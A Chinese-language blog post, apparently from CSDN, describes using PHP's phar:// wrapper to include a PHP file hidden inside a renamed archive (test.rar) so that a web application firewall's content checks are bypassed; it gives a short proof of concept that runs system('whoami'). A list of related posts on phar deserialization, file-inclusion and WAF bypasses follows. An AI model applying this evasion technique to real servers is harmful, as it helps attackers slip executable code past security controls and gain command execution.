利用PHP中的phar伪协议绕过waf

最新推荐文章于 2024-06-21 17:44:48 发布
最新推荐文章于 2024-06-21 17:44:48 发布
阅读量2.9k 收藏 1
点赞数
分类专栏: 技术分享

可能有人已经早已经知道了,不过我也是一次在研究phar扩展的溢出漏洞时发现的一个技巧,就是利用phar:协议,这个协议可能在渗透过程中会帮你绕过一些东西。

我能够想到的是有些waf不会防php后缀的文件,但是他会检测里面的内容,我们可以通过包含的方式,包含rar后缀或者phar后缀里面的txt文件或者jpg文件达到绕过防护的目的,具体我也时间细细的把玩。你们可以自己想想,怎样利用才是最好的。

test.php代码内容:

 

<?php
 
include 'phar://test.rar/test.txt';
 
?>

test.txt里的内容:

<?php
 
echo system('whoami');
 
?>

然后将test.txt进行压缩,然后可以将压缩包的后缀改为zip.phar.rar等格式。这里我改为test.rar

 

大方子
关注
专栏目录
伪协议绕过总结记录(本地文件包含、远程文件包含、SSRF)
墨痕诉清风的博客
01-16 1118
如果LFI只是阅读文件,而不是执行其php代码,例如使用file_get_contents()、fopen()、file()或file_exists()、md5_file()、filemtime()或filesize()等函数。这个特性最好的一点是,即使使用不评估PHP代码的PHP函数,如file_get_contents()、fopen()、file()或file_exists()、md5_file()、filemtime()或filesize(),也会发生这种反编译。轻量级目录访问协议。
5.1. PHP
热门推荐
Sumarua的博客
07-05 1万+
内容索引:5.1. PHP5.1.1. 后门5.1.1.1. php.ini构成的后门5.1.1.2. .user.ini文件构成的PHP后门5.1.2. 反序列化5.1.2.1. PHP序列化实现5.1.2.2. PHP反序列化漏洞5.1.2.3. 相关CVE5.1.2.3.1. CVE-2016-71245.1.3. Disable Functions5.1.3.1. 机制实现5.1.3.2. Bypass5.1.4. Open Basedir5.1.4.1. 机制实现5.1.5. 安全相关配置5.1.
[代码审计篇]php代码审计之浅析Phar伪协议
qq_43668710的博客
04-15 1523
0x01 前言 简要说明 写这篇博客的目的只有两个 为**[代码审计篇]**关于php反序列化漏洞的审计作铺垫 为上一篇博客做点漏洞原理的补充 环境工具 Win10 Phpstudy_pro Sublime_Text 3 注意(tips) PHAR的使用需要将php.ini设置phar.readonly设置为Off才能用于PHAR对象 PHAR 这个词是PHP和 Archive的组合词,基...
php伪协议漏洞_浅析phar反序列化漏洞攻击及实战
weixin_39785150的博客
12-10 644
浅析phar反序列漏洞攻击及实战前言phar反序列化漏洞很久之前就开始接触了;因为当时出了点问题导致一直无法成功,所以当时直接去学习其他的漏洞了;今天觉得是时候把这个漏洞补上去了;漏洞成因phar文件会以序列化的形式存储用户自定义的meta-data;该方法在文件系统函数(file_exists()、is_dir()等)参数可控的情况下,配合phar://伪协议,可以不依赖unse...
phar反序列化及绕过
最新发布
2401_82985722的博客
06-21 1125
phar (PHP Archive) 是PHP里类似于Javajar的一种打包文件。可以把多个php文件存放至同一个文件,无需解压,PHP就可以进行访问并执行内部语句。一般使用 文件包含的,phar://伪协议,读取.phar文件文件包含之——phar伪协议不管后缀是什么,都会当做压缩包来解压?file=phar://压缩包/内部文件e.g 将一句话木马(shell.php)压缩成压缩包形式(shell.zip),将压缩包后缀改为.jpg(shell.jpg)?
phar文件上传的骚姿势(绕过phar、_HALT)
qq_62046696的博客
10-07 1936
前面也讲过一次phar文件上传的东西,但是那都是过滤比较低,仅仅过滤了后缀。知道今天看到了一篇好的文章。
php伪协议phar
woshicainiao666的博客
02-19 877
php伪协议---phar
渗透测试-PHP反序列化及绕过
cdyunaq的博客
04-26 4488
最简单的反序列化 require_once('flag.php'); highlight_file(__FILE__); classA{ private$user='test'; function__destruct(){ ...
常见6种WAF绕过和防护原理
m0_48368237的博客
01-18 2118
常见6种WAF绕过和防护原理 本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担! 今天就聊聊关于上传绕过WAF的姿势,WAF(Web Application Firewall)简单的来说就是执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。上传绕过不算什么技术了,正所谓未知防,焉知攻,先来了解一下网站的防御措施吧! 一、Bypass Waf 1.一般开发人员防御策略 客户端javascript校验(一般只校验后缀名)服务端校验1>文件头content
ctf怎样获取php文件源码,CTF文件包含的一些技巧
weixin_39580682的博客
03-09 3749
前言文件包含在 CTF 比赛也是常考的一个点,这里对一些包含点的原理、特征进行一些总结,并结合实际的例子来讲解如何绕过php伪协议的分类伪协议是文件包含的基础,理解伪协议的的原理才能更好的利用文件包含漏洞。php://inputphp://input代表可以访问请求的原始数据,简单来说POST请求的情况下,php://input可以获取到post的数据。使用条件:include()、includ...
php(phar)反序列化漏洞及各种绕过姿势
MrWangisgoodboy的博客
04-14 5116
概念:序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。简单来说就是我在一个地方构造了一个类,但我要在另一个地方去使用它,那怎么传过去呢?于是就想到了序列化这种东西,将对象先序列化为一个字符串(数据),后续需要使用的时候再进行反序列化即可得到要使用的对象,十分方便。来看看怎么说:所有php里面的值都可以使用函数来返回一个包含字节流的字符串来表示。函数能够重新把字符串变回php原来的值。序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。
php代码审计15.3之phar伪协议与反序列化
划水的小白白
07-15 814
1、基础 2、生成phar格式文件 3、例子 4、小试牛刀
phpphar归档
beyond__devil的博客
02-11 686
今天,打算详细的看看 composer 文档,一直知道有个 composer.phar 文件,经常见,但就不知道 '.phar' 后缀的文件,是做什么的,就百度了下: PHP5.3之后支持了类似Java的jar包,名为pharphp手册的压缩与归档有这个phar东西,一直没看过这个!简单看了下才了解了。 jar(java+archive) phar(php+archive) 1.
php伪协议绕过限制写shell
weixin_44304686的博客
06-12 2196
原文链接:https://mochazz.github.io/2019/01/14/php伪协议绕过限制写shell/ 这是在 code-breaking 遇到的一道题目,名为:easy - phpmagic。题目地址:http://51.158.75.42:8082 整个代码逻辑很简单,需要关注的点就两个。一个是 第17-18行 处存在命令字符串格式化,而这里的格式化变量 domain∗∗经...
反序列化漏洞 (2)------php 反序列化漏洞 ----- session反序列化问题,phar,pop,绕过__wakeup()
Z_Grant的博客
11-19 1528
文章目录一、漏洞简述php反序列化漏洞又称对象注入二、漏洞利用过程(1) 绕过__wakeup()的限制三、Session反序列化漏洞(1) Session序列化机制PHP处理器的三种序列化方式:配置文件 php.ini 的说明 一、漏洞简述php反序列化漏洞又称对象注入 原理:在php反序列化的时候,反序列化的内容可控,那么恶意用户就可以构造特定序列化内容的代码,通过unserialize()函...
phar / zip 伪协议的应用wp
CHUNJIUJUN的博客
08-13 1761
查看源码 显示只能上传txt文件 上传一个txt文件试试 上传成功 这里我们退回主页面,发现有一个LFI here,意思是:这里是文件包含,点进去发现页面和源码什么都没有 退回主页面查看主页面源码,发现有提示 lfi.txt 我们将刚刚的 lfi.php 改成 lfi.txt 试一试,发现有内容,意思是给file传了一次参数,给file传的参数不能为空,无论file名是什么,都在file名后加一个 .php 后缀,注释的意思是值允许php文件被包含 ...
phar是啥?
09-18 801
C#可以把代码打包成dll java可以把代码打包成jar 那么凭什么PHP不可以?实际上在PHP5.3之后就出现了类似的东西叫做phar新建build.txt:<?php$phar = new Phar("test.phar"); $phar->buildFromDirectory(__DIR__.'/files','/\.php$/'); //编译files目录下的所有.php文件 $p
浅谈php filter伪协议及一些绕过姿势
2301_77004573的博客
05-09 1802
(3).iconv.<input-encoding>.<output-encoding>或<input-encoding>/<output-encoding>:将输入的字符串编码转换成输出指定的编码。补充姿势:可以利用管道符进行多次编码如:php://filter/read=convert.base64-encode|convert.base64-encode/resource=文件名。例如最基础的:php://filter=convert.base64-encode/resource=文件名。
phar://伪协议
02-28
phar://伪协议PHP的一个特殊协议,用于访问和操作PHP归档文件(.phar文件)。.phar文件是一种将多个PHP文件打包成单个可执行文件的方式,类似于Java的JAR文件或Python的ZIP文件。 通过phar://伪协议,可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值